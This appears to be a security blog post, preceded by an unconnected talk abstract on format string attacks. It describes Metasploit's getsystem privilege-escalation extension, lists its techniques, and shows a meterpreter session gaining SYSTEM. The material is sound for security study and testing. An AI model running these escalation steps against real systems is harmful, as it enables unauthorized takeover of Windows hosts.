Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery. This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise as well as incorporate those techniques into the Metasploit framework. The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again.
A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit‘s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module.
Getsystem uses several techniques for priv escalation:
- Windows Impersonation Tokens (fixed by MS09-012)
- Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
- Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
- Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)
As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension which i will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):
meterpreter > use priv
Loading extension priv…success.
meterpreter > getsystem -h
Usage: getsystem [options] Attempt to elevate your privilege to that of local system.
-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM